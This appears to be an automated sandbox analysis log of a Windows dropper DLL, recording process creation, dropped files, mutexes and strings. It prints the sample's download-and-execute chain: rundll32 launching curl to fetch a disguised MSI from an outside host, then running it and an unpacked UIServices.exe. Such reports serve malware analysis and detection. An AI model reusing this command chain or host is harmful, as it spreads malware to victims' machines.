Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\curl.exe

File created: C:\Users\user\AppData\Local\Temp\spclwow78x.msi

Jump to behavior

Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary string: Failed to open \Device\Afd\Mio: HSF@
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary string: \Device\Afd\Mio

Source: classification engine

Classification label: mal52.troj.evad.winDLL@83/61@3/2

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:68:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.ini

Jump to behavior

Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr

PE file contains sections with non-standard names

Source: 30833088ae6bfb4abc107567083083c9.tmp.37.dr	Static PE information: section name: _RDATA
Source: 29b46379382ed74d83879371e86987c8.tmp.45.dr	Static PE information: section name: _RDATA
Source: fcfd202f570ae346b7d75b811246e386.tmp.53.dr	Static PE information: section name: _RDATA

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI931A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8CB0.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI24FC.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC14D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI931A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8CB0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI24FC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC14D.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Uses cacls to modify the permissions of files

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
